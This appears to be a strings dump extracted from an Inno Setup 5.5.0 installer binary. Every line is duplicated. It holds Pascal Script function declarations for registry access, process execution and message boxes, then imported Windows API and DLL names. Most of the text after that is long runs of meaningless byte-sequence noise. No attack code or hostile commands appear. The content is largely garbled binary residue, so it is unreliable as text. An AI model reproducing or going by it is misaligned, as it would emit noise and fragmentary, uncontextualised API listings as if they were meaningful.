function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function MsgBoxEx(hWnd: Longword; AText, ACaption: string; AType, AIcon: Longword; ATimeOut: Integer): Integer;
function MsgBoxEx(hWnd: Longword; AText, ACaption: string; AType, AIcon: Longword; ATimeOut: Integer): Integer;
function InputBoxEx(hWnd: Longword; AText, ACaption, ADefaut, APasswordChar: string; AIcon: Longword; AWidth, AHeight, ATimeOut: Integer; var AResultStr: String): Boolean;
function InputBoxEx(hWnd: Longword; AText, ACaption, ADefaut, APasswordChar: string; AIcon: Longword; AWidth, AHeight, ATimeOut: Integer; var AResultStr: String): Boolean;
procedure SetPassword(const Password: String);
procedure SetPassword(const Password: String);
function CheckForMutexes(Mutexes: String): Boolean;
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
procedure RaiseException(const Msg: String);
function SetSetupPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetSetupPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
Uh.QP
Uh.QP
IMsgt
IMsgt
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
MSGBOX
INIKEYEXISTS
INIKEYEXISTS
GETCMDTAIL
GETCMDTAIL
REGKEYEXISTS
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
REGGETSUBKEYNAMES
MSGBOXEX
MSGBOXEX
SETPASSWORD
SETPASSWORD
CHECKFORMUTEXES
CHECKFORMUTEXES
SHELLEXEC
SHELLEXEC
SHELLEXECASORIGINALUSER
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
EXITSETUPMSGBOX
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
GETWINDOWSVERSIONSTRING
SUPPRESSIBLEMSGBOX
SUPPRESSIBLEMSGBOX
GetWindowsVersionEx
GetWindowsVersionEx
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword
HelpKeyword
AutoHotkeys
AutoHotkeys
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
kernel32.dll
kernel32.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyW
LoadKeyboardLayoutW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextW
GetKeyNameTextW
ExitWindowsEx
ExitWindowsEx
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
msimg32.dll
msimg32.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
version.dll
version.dll
mpr.dll
mpr.dll
TransactNamedPipe
TransactNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
CreateNamedPipeW
CreateNamedPipeW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegFlushKey
RegFlushKey
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExW
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
winspool.drv
winspool.drv
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
ShellExecuteW
ShellExecuteW
comdlg32.dll
comdlg32.dll
!%FKO=EH4
!%FKO=EH4
"""
"""
024)%,,)1
024)%,,)1
4Ib%5Xs~
4Ib%5Xs~
##ÿI*,.
##ÿI*,.
%)(/6(05
%)(/6(05
$( 4*/8-1=/4>
$( 4*/8-1=/4>
556???,,,
556???,,,
!%'#)*)-/458:569-.1'),))-'( !$%
!%'#)*)-/458:569-.1'),))-'( !$%
"(&0; 3
"(&0; 3
!#!')$ ,(.0*.1 /2%),
!#!')$ ,(.0*.1 /2%),
S^|EWz;Pv.Dd7JjYi
S^|EWz;Pv.Dd7JjYi
$#"976$##
$#"976$##
'(! 2(.;
'(! 2(.;
=-6;$ 1
=-6;$ 1
$&!(*% -%*, %'
$&!(*% -%*, %'
##'0"',,23
##'0"',,23
:88-,,-,,
:88-,,-,,
"(/18>"*/
"(/18>"*/
"!&(#(*)-/(-/$) %'
"!&(#(*)-/(-/$) %'
657304516
657304516
"$& -,13 02-24 13',.!&(',.7=>&)-
"$& -,13 02-24 13',.!&(',.7=>&)-
'.6')5$(6 )8
'.6')5$(6 )8
'&(0/1869
'&(0/1869
$&!&( %'(-/-242795:
$&!&( %'(-/-242795:
#/"'3#(4
#/"'3#(4
((,5%*4 !/
((,5%*4 !/
"$',.& -*/138:6;=279057-24(-/%),$&*%**
"$',.& -*/138:6;=279057-24(-/%),$&*%**
/01$',15@
/01$',15@
":=.2/
":=.2/
#.%*6-2>
#.%*6-2>
%*,*/1,13-24/46& -
%*,*/1,13-24/46& -
.35 02( /)*/"''
.35 02( /)*/"''
$.!&1-2>$)6
$.!&1-2>$)6
! #(3)3@
! #(3)3@
#EQVVb35A#&4
#EQVVb35A#&4
$*)/4 1629>!'-
$*)/4 1629>!'-
0575:
0575:
**.dcf
**.dcf
!#&'03114.ae\fh]46 9;1=?5?A7FI>PSFNQE[^U@C>XZWY_Z4
!#&'03114.ae\fh]46 9;1=?5?A7FI>PSFNQE[^U@C>XZWY_Z4
%)3 % !&, %)
%)3 % !&, %)
',.37;%*.
',.37;%*.
"( #',
"( #',
$&%*, 1437
$&%*, 1437
!'#&,"',
!'#&,"',
((-TTWklqz}
((-TTWklqz}
#().0-24& -
#().0-24& -
"$,2349;*.3/38.27,05( 1).2)./$) #(*
"$,2349;*.3/38.27,05( 1).2)./$) #(*
'''&&&'''
'''&&&'''
#( /4 /4
#( /4 /4
!%!&().0%*,
!%!&().0%*,
#8:7;>(,1$(-&*/' 0"&
#8:7;>(,1$(-&*/' 0"&
$%).,05$'-
$%).,05$'-
#%(-/056*.1$(-(,1"&
#%(-/056*.1$(-(,1"&
#,04(,0!&*%)./38' 0
#,04(,0!&*%)./38' 0
"#,34.7929:,20
"#,34.7929:,20
!$&'()*=>?$&(
!$&'()*=>?$&(
!' &2&*8
!' &2&*8
$(#&,26;049
$(#&,26;049
,45 35)1/.308;;
,45 35)1/.308;;
! !!!&(,"(1$ 6
! !!!&(,"(1$ 6
!& $)"&
!& $)"&
!&)-237
!&)-237
#'.Wepz
#'.Wepz
#"& #',!%* $) $)!%* $)
#"& #',!%* $) $)!%* $)
!* $,/2:68<::>
!* $,/2:68<::>
765=<:>
765=<:>
#(#', $) $)(,1 $)
#(#', $) $)(,1 $)
58@),1368-./)(*
58@),1368-./)(*
!% %(%*- %(
!% %(%*- %(
$(058 03
$(058 03
'#. &1.(55.985943953"
'#. &1.(55.985943953"
.JThMUh
.JThMUh
'.0725
'.0725
!(%'/%'/
!(%'/%'/
!)/29'*1
!)/29'*1
"1$&0&&6$#8#"1
"1$&0&&6$#8#"1
!&(&*-*3629
!&(&*-*3629
!"#&&!""
!"#&&!""
&!$ &)0"%,
&!$ &)0"%,
#"*/038 !$
#"*/038 !$
#3%'3""5$"8('6$$*
#3%'3""5$"8('6$$*
'1$0;*3
'1$0;*3
")"%,!$
")"%,!$
"'$(-*.3*.3038.2717
"'$(-*.3*.3038.2717
!0 #4$%;$"8""3""/
!0 #4$%;$"8""3""/
, ".()5/048:?37?
, ".()5/048:?37?
QV[(,137ABCHIKQTV^`\ehjsuv}
QV[(,137ABCHIKQTV^`\ehjsuv}
03:!$ #',
03:!$ #',
%(/#&-/2925
%(/#&-/2925
"1%':(*>&':&'712>/19(-5
"1%':(*>&':&'712>/19(-5
&(($$&!
&(($$&!
#/%.4>EHJLN./.#$!12.QPN=
#/%.4>EHJLN./.#$!12.QPN=
!,!#-!#-"$.HJT>@J
!,!#-!#-"$.HJT>@J
>>>???444%%%
>>>???444%%%
\\],,,
\\],,,
'-07039-0726;,05$(-' 0' 0*.347
'-07039-0726;,05$(-' 0' 0*.347
"0&
"0&
!#"$)()#!!
!#"$)()#!!
|~|121ssshhh
|~|121ssshhh
"*14
"*14
"().CCGYZ]ikl_abIMLTVUZ\ZUXWKONCGG*0/;A=33
"().CCGYZ]ikl_abIMLTVUZ\ZUXWKONCGG*0/;A=33
$."(4*.:
$."(4*.:
.1Y,'
.1Y,'
$$$'''"""
$$$'''"""
$ #* #)#&-/29) 4
$ #* #)#&-/29) 4
0%'6.0;#% ~
0%'6.0;#% ~
)*!35 9;3'("-.)
)*!35 9;3'("-.)
8;@ 11 209?>6;=-27$,1!(-
8;@ 11 209?>6;=-27$,1!(-
") 535?/1; .7$$0
") 535?/1; .7$$0
%%'-),6*.834:68=
%%'-),6*.834:68=
%%33///
%%33///
# ,5#%.*/6$ 3!'.#' $(-"&
# ,5#%.*/6$ 3!'.#' $(-"&
#(&*/#',
#(&*/#',
-#) ##%
-#) ##%
".23"'%*/. .1$(-
".23"'%*/. .1$(-
%#%/(*4%'1"#-
%#%/(*4%'1"#-
'!$)$* "$*)(4/2:
'!$)$* "$*)(4/2:
===
===
# $'!%* %)
# $'!%* %)
#"& *.5( 1.17/39
#"& *.5( 1.17/39
%*0"&,$*/
%*0"&,$*/
$% &(!"(
$% &(!"(
)))222 !
)))222 !
#$$)*#(*!%)$(-&*/' 0-16
#$$)*#(*!%)$(-&*/' 0-16
#$ 0$*/*.3
#$ 0$*/*.3
"'$(- $)!%*&*/
"'$(- $)!%*&*/
;=36$%
;=36$%
),/#(,%*, %'!&(',.$) "')
),/#(,%*, %'!&(',.$) "')
#% %(!&)).1.35
#% %(!&)).1.35
&.0#*,& -
&.0#*,& -
!#&-/ 33-558
!#&-/ 33-558
%FIX{.6P
%FIX{.6P
-#02*--(57004)
-#02*--(57004)
#$.wz
#$.wz
"$ %&,12!&'
"$ %&,12!&'
""!&'#()279).1
""!&'#()279).1
'03-37)-1
'03-37)-1
%%,.$*,)00-45#((#'&376
%%,.$*,)00-45#((#'&376
#%"&* $*
#%"&* $*
"$)-/056,2359
"$)-/056,2359
!%"#% ,,$$'##'''*(( $$'''* *,/.0102.-/, - *,)(**) 435213*)
!%"#% ,,$$'##'''*(( $$'''* *,/.0102.-/, - *,)(**) 435213*)
&(0,27#*0"'-
&(0,27#*0"'-
#%,13',-)./49;#))
#%,13',-)./49;#))
),"460585' *&* #(
),"460585' *&* #(
&( %( #'**/)),#$%
&( %( #'**/)),#$%
$$%:;
$$%:;
79/24*.0%.0&,.$,.$24*68.-0%$(
79/24*.0%.0&,.$,.$24*68.-0%$(
9Pi%9S9F[MSbY^dX_`?BC%&(
9Pi%9S9F[MSbY^dX_`?BC%&(
!)* ,./ %&
!)* ,./ %&
/1 -/(4>@6
/1 -/(4>@6
5:.35./0,
5:.35./0,
#()/38#(-
#()/38#(-
/1'11,12,-/&/1'(* ,-")* ) !*,!&(
/1'11,12,-/&/1'(* ,-")* ) !*,!&(
,0$
,0$
R]pWbuP[oOZk@CLYX_(&, *.CCF)) ""D7;;>669||
R]pWbuP[oOZk@CLYX_(&, *.CCF)) ""D7;;>669||
223::;#"#
223::;#"#
"&/26'*/
"&/26'*/
"&%*."&(
"&%*."&(
%( '*"%(
%( '*"%(
,/&.0($&
,/&.0($&
.1(69/ 0%$(
.1(69/ 0%$(
$0(*235>
$0(*235>
!$&&(**,103-,.YY[^]`778001 * 111222323213"!#
!$&&(**,103-,.YY[^]`778001 * 111222323213"!#
CFG@EF(-.AFGJOP',-',-',,
CFG@EF(-.AFGJOP',-',-',,
'*&%-0(02"*-
'*&%-0(02"*-
$(( /0.12,-.123/23-12)./3897;
$(( /0.12,-.123/23-12)./3897;
$' ),$'*""%
$' ),$'*""%
', *0%-1(04# /
', *0%-1(04# /
!$%"%&"%&
!$%"%&"%&
$)*389257 24(24
$)*389257 24(24
& ,167(,.-57 68
& ,167(,.-57 68
#$##'&$%&
#$##'&$%&
11487:,*0
11487:,*0
&-#)1!'/
&-#)1!'/
"#"&'$***12*46
"#"&'$***12*46
,"-1"(/
,"-1"(/
'(.LRW
'(.LRW
//1, ,'
//1, ,'
36.14,580-2*
36.14,580-2*
",)/7"'-
",)/7"'-
"%'' ,/;9@ECK65;99>@JKL* ,/020/4.-4, .DCE|{}[Z\(')XWX\]]---///666777888577@uy{RWY:?CAGNGMUKQWKPTEHNILPMPS
"%'' ,/;9@ECK65;99>@JKL* ,/020/4.-4, .DCE|{}[Z\(')XWX\]]---///666777888577@uy{RWY:?CAGNGMUKQWKPTEHNILPMPS
$. 0:).8
$. 0:).8
#$% './
#$% './
'*"%( $'
'*"%( $'
-0(46.)-%,0(17.
-0(46.)-%,0(17.
$$%))), ,..."""#$$
$$%))), ,..."""#$$
")*4:&/7
")*4:&/7
&*'/2&.0(01*04
&*'/2&.0(01*04
' (,"(,!)-#/3)/3)15 !%
' (,"(,!)-#/3)/3)15 !%
%!'0"(2"'3
%!'0"(2"'3
' !.2#16
' !.2#16
%*).8 #105@
%*).8 #105@
* %%%
* %%%
"" 0)5:!,3
"" 0)5:!,3
$)#)0"'0
$)#)0"'0
* '.GOQz
* '.GOQz
' /$26 -1%6:. /#26 ' .1)682150
' /$26 -1%6:. /#26 ' .1)682150
#,0*381:?%.2
#,0*381:?%.2
/578
/578
&*$/3'16
&*$/3'16
&,#-2'28#,2
&,#-2'28#,2
.Cd$2J
.Cd$2J
)-"*.#(,!
)-"*.#(,!
(,!-1%*." 0$"%
(,!-1%*." 0$"%
&*.6=>7>@%,.
&*.6=>7>@%,.
%)$.2*6;/;@'38".3
%)$.2*6;/;@'38".3
$" .)46 8;'6:$15
$" .)46 8;'6:$15
*.#59."&
*.#59."&
#$-/4,.3026'*.
#$-/4,.3026'*.
!% &( 0249;$) %'
!% &( 0249;$) %'
$ & .)-/
$ & .)-/
!#/03 "%
!#/03 "%
59,;?4(-!
59,;?4(-!
23-8:3-0'$(
23-8:3-0'$(
%& 03/46699
%& 03/46699
-/024%')* .%&(
-/024%')* .%&(
#) $))-0'-/
#) $))-0'-/
& .5;28@06?05)-9
& .5;28@06?05)-9
%#).#),(,.$&(
%#).#),(,.$&(
%)*)//*23'/1
%)*)//*23'/1
/,7=/6@"*1
/,7=/6@"*1
(,!
(,!
%$.35 &(#(*!$%
%$.35 &(#(*!$%
146 03!%(#(*
146 03!%(#(*
\\[343.0/
\\[343.0/
%),27"(*'*-#%(
%),27"(*'*-#%(
!&$,/ (*
!&$,/ (*
wZ^Whkey|u
wZ^Whkey|u
' 48-59. /$,0&(-! 1 #*
' 48-59. /$,0&(-! 1 #*
&)*)-.(-/"'*
&)*)-.(-/"'*
"##444'((
"##444'((
.27*.3(,1),146;25:(-206;08=08: ()
.27*.3(,1),146;25:(-206;08=08: ()
&(*14(/3
&(*14(/3
!'#)/&,2&,2(-3"(1
!'#)/&,2&,2(-3"(1
! %)*(./
! %)*(./
"$ 35/7:"05
"$ 35/7:"05
14(/3'' $)
14(/3'' $)
%*#,1,-1.-0/
%*#,1,-1.-0/
"#(-/ $&
"#(-/ $&
BS~7Oy1O} Kx%Cj
BS~7Oy1O} Kx%Cj
14(.3&*.!/3&/3&&*
14(.3&*.!/3&/3&&*
& :"'2#)0
& :"'2#)0
$*.4' 0'*/,0536;,.3/16).3 ' !*- 48
$*.4' 0'*/,0536;,.3/16).3 ' !*- 48
" "'5 .@&);"&0
" "'5 .@&);"&0
!"/56.67
!"/56.67
). 0" &
). 0" &
"-.-.RQP,.0).3/5<.6>
"-.-.RQP,.0).3/5<.6>
)-1*.3"%,
)-1*.3"%,
!" 1 39&-6)06&-2
!" 1 39&-6)06&-2
/5#6
/5#6
) ,*--"%%*0.6=:,21/47-1702;$)/
) ,*--"%%*0.6=:,21/47-1702;$)/
$&%***/.-
$&%***/.-
"#%)*') 1454==/99,671>>0>@
"#%)*') 1454==/99,671>>0>@
(," /(&)&;=;
(," /(&)&;=;
!#057(-/"')
!#057(-/"')
357#%',.1"$)
357#%',.1"$)
$&!&( %'
$&!&( %'
* 4189%,.&-/%,.
* 4189%,.&-/%,.
)#%**#'*/29-176
)#%**#'*/29-176
5GcO`xWe|>Oh.Ge`|
5GcO`xWe|>Oh.Ge`|
.1802;* 3#$
.1802;* 3#$
"##) & -"')
"##) & -"')
-1 37'6
-1 37'6
)')3&'0 %/
)')3&'0 %/
!24;/1:%&2%%-
!24;/1:%&2%%-
!"(* "**
!"(* "**
'&!*("()
'&!*("()
""%)%(- #(
""%)%(- #(
-/98)0.*1-,20% &
-/98)0.*1-,20% &
.1$.0%"&
.1$.0%"&
*.% .).3'
*.% .).3'
212\\],./
212\\],./
16
16
%()/139
%()/139
"& #&$')#'(
"& #&$')#'(
$%$//&22*3629>3
$%$//&22*3629>3
"## %--
"## %--
$/2! !('
$/2! !('
$ ")-(01 ()
$ ")-(01 ()
',-IRPr}~z
',-IRPr}~z
* "("%&6792130.097977;.2>
* "("%&6792130.097977;.2>
!" (*$,.
!" (*$,.
#& '( ') &
#& '( ') &
$-1&22&/.!(& #)%
$-1&22&/.!(& #)%
)* ,-#$$
)* ,-#$$
"$ (*!(*
"$ (*!(*
!" 1#.0$,-$,,# ))0-(/)
!" 1#.0$,-$,,# ))0-(/)
%%,3'/5%.5
%%,3'/5%.5
)# 2!,/'/1'./# *&- 2.'/&
)# 2!,/'/1'./# *&- 2.'/&
-0369$&(
-0369$&(
(-!( ()
(-!( ()
(&'/ 3,$-$$'!"%
(&'/ 3,$-$$'!"%
%( (,!14, "
%( (,!14, "
3558;
3558;
87;15
87;15
,39'.407=.5;06
,39'.407=.5;06
"(!(-").
"(!(-").
!)$(2)*4)',#
!)$(2)*4)',#
)****)/..:9:%&)
)****)/..:9:%&)
'-#*0%,2%,2&.4!/4
'-#*0%,2%,2&.4!/4
!5(0?',8( 313?% ;
!5(0?',8( 313?% ;
#*'(/,-513:62:6*2.
#*'(/,-513:62:6*2.
*),-/2'**##$
*),-/2'**##$
# $(3& ;
# $(3& ;
*0.,31-31,21% )
*0.,31-31,21% )
<:>
<:>
&%'-*-4#*3
&%'-*-4#*3
!" %&"'(
!" %&"'(
"%*2!$0"%6
"%*2!$0"%6
/.1277(./&( ,,/!
/.1277(./&( ,,/!
#)"(."(-
#)"(."(-
#(" 0!)/
#(" 0!)/
&- '.%,2'-5
&- '.%,2'-5
#)',20*0/(.-
#)',20*0/(.-
4H$Ki%UxT
4H$Ki%UxT
!"57:
!"57:
$#', 064
$#', 064
22502688>>278,12,11 00*./-12&(
22502688>>278,12,11 00*./-12&(
'&-5$-3'/6 28"*1
'&-5$-3'/6 28"*1
behKQQAIF=EDAIH&/.bijpwy{
behKQQAIF=EDAIH&/.bijpwy{
*6o1FYHbu
*6o1FYHbu
:;<:>39;279-24%*,"')&*.,04$(-
:;<:>39;279-24%*,"')&*.,04$(-
%. /95.:6
%. /95.:6
35,570) *35915839;,12& ,#()#(*!&,
35,570) *35915839;,12& ,#()#(*!&,
%#!&%'-,% *
%#!&%'-,% *
&>.CUCVo
&>.CUCVo
!".25 14& /.37/47'*/
!".25 14& /.37/47'*/
*2$/7",2" 1
*2$/7",2" 1
'0!)3&.8")5
'0!)3&.8")5
(?-/=(')
(?-/=(')
#).9(.8#(
#).9(.8#(
''4;>$,0
''4;>$,0
$%'-1#)1,2=
$%'-1#)1,2=
%-!/; 8L!D]%SnV
%-!/; 8L!D]%SnV
!*( 19:=(-,
!*( 19:=(-,
)45.9
)45.9
5")9!"*!
5")9!"*!
OUR)/.FIRehtpv~tz
OUR)/.FIRehtpv~tz
$$/2/*)'
$$/2/*)'
...89:%'() .GMOQSV_^aRSW[]c?AF
...89:%'() .GMOQSV_^aRSW[]c?AF
QX^!(8%.C
QX^!(8%.C
%!%1$#- )
%!%1$#- )
%%$* *687788***%$$
%%$* *687788***%$$
&.(,/#$&! #
&.(,/#$&! #
(('010987
(('010987
"1369;>/14:;>
"1369;>/14:;>
%%;@@388
%%;@@388
%( /2.:=
%( /2.:=
#"6
#"6
$*.27D 1C",??L]{J[}Pa
$*.27D 1C",??L]{J[}Pa
'/.nvr
'/.nvr
/43;@? %$
/43;@? %$
###**#**
###**#**
$('032!$#
$('032!$#
!-Wd}EZ{@\
!-Wd}EZ{@\
‡CFFQPU`
‡CFFQPU`
/.-10 $""&$)-
/.-10 $""&$)-
- ).,*&$"
- ).,*&$"
!%##'2)- %)'
!%##'2)- %)'
%",30$ (
%",30$ (
!(' 45'/1 (*"*,
!(' 45'/1 (*"*,
#'$' )$(&$(&(,*
#'$' )$(&$(&(,*
$)(-329>$/." *
$)(-329>$/." *
"&%' *#'%
"&%' *#'%
". '1!&0
". '1!&0
-.3$$)337
-.3$$)337
#/#(6'*:( :
#/#(6'*:( :
$"'*>.12*,30/;
$"'*>.12*,30/;
&.,7>#27&15&/2
&.,7>#27&15&/2
!6"&
!6"&
"* &/2$.5&3=
"* &/2$.5&3=
"0-25;;(-
"0-25;;(-
!#!#&!$)!&,&,3 &/ 0;.3?!&1!&1
!#!#&!$)!&,&,3 &/ 0;.3?!&1!&1
#.$(3!*5
#.$(3!*5
!* &0"(2
!* &0"(2
"8"(> &=
"8"(> &=
#6' >'*
#6' >'*
!/!#0 #.
!/!#0 #.
*(%>=:552-. !"
*(%>=:552-. !"
% $/)*1,/40,0.
% $/)*1,/40,0.
$.$ 5)2;*3> 3@'/>
$.$ 5)2;*3> 3@'/>
$ *$"*#(-)042*,,
$ *$"*#(-)042*,,
#%$')%' &).& 0!(."(2$)1
#%$')%' &).& 0!(."(2$)1
,-,220!!
,-,220!!
$(%)0-(. ,0.!$"
$(%)0-(. ,0.!$"
'-2!',!',$)/!&-"'. ',!(-
'-2!',!',$)/!&-"'. ',!(-
,,)==:''$663
,,)==:''$663
$!(&%*(*.,-/-
$!(&%*(*.,-/-
$)&,0 &*#),',2 17#).
$)&,0 &*#),',2 17#).
(,3*/8 '5! 9 '6
(,3*/8 '5! 9 '6
$&*/5/5; '-
$&*/5/5; '-
' $/1289* *
' $/1289* *
''$((%%%"
''$((%%%"
""&(5:;9>@.340579=@7;@26;' /
""&(5:;9>@.340579=@7;@26;' /
#F&,L*/M"'D"*J%.S,6^4>lFP
#F&,L*/M"'D"*J%.S,6^4>lFP
$"!##!$%!$$!%%" (
$"!##!$%!$$!%%" (
#& #&!&(# #
#& #&!&(# #
.0*&)$#*'!). 5859
.0*&)$#*'!). 5859
# & "'. %.
# & "'. %.
"$(36:'*.
"$(36:'*.
''$%%"**&441==:;;9/0/&''&&'023 ./%()& ,
''$%%"**&441==:;;9/0/&''&&'023 ./%()& ,
$$&('' )
$$&('' )
")$$ %'-'&*.*-'
")$$ %'-'&*.*-'
/*)*'‰6## ""
/*)*'‰6## ""
((%--*((%**&231* )'''"""$%%.21%(("&'
((%--*((%**&231* )'''"""$%%.21%(("&'
$03:ptzDGM@CJ^ahX[b57>--3*).HHKbaeeck^]gabnrt
$03:ptzDGM@CJ^ahX[b57>--3*).HHKbaeeck^]gabnrt
%''.-*2"%,
%''.-*2"%,
$#"-)(1 )&"
$#"-)(1 )&"
*)(('& *(&-330)("
*)(('& *(&-330)("
(*'.0,"&"
(*'.0,"&"
#- $.&'/22:44:$&.
#- $.&'/22:44:$&.
(%.:%-9!'3"'4
(%.:%-9!'3"'4
$"%-%*/( .
$"%-%*/( .
#(.,1;,0=
#(.,1;,0=
$.).9*/9' 6$&.!#'$&)(-.
$.).9*/9' 6$&.!#'$&)(-.
%*0(.3$ /
%*0(.3$ /
" (,*-1/
" (,*-1/
#%$).&$))*203>%(5
#%$).&$))*203>%(5
!)" 0!(0$*1*06!(."'/35;445456'
!)" 0!(0$*1*06!(."'/35;445456'
'*'-2"'/
'*'-2"'/
*%(5 %0 &-
*%(5 %0 &-
(*&;=9$&$
(*&;=9$&$
$' &)# #
$' &)# #
%#-1/$(&
%#-1/$(&
$)&.3$*0
$)&.3$*0
#$ .0."&$
#$ .0."&$
"%$153(,*(,
"%$153(,*(,
"%!),&-2%)3
"%!),&-2%)3
LNP5;;:AF@JUDP_Tgy=Pb2;F
LNP5;;:AF@JUDP_Tgy=Pb2;F
!"&%$('&.-,, *(''**(11/;:8>=;::8331
!"&%$('&.-,, *(''**(11/;:8>=;::8331
#&(03'/4-28
#&(03'/4-28
#("&%(-,
#("&%(-,
%"&1$ 5%.: (3
%"&1$ 5%.: (3
((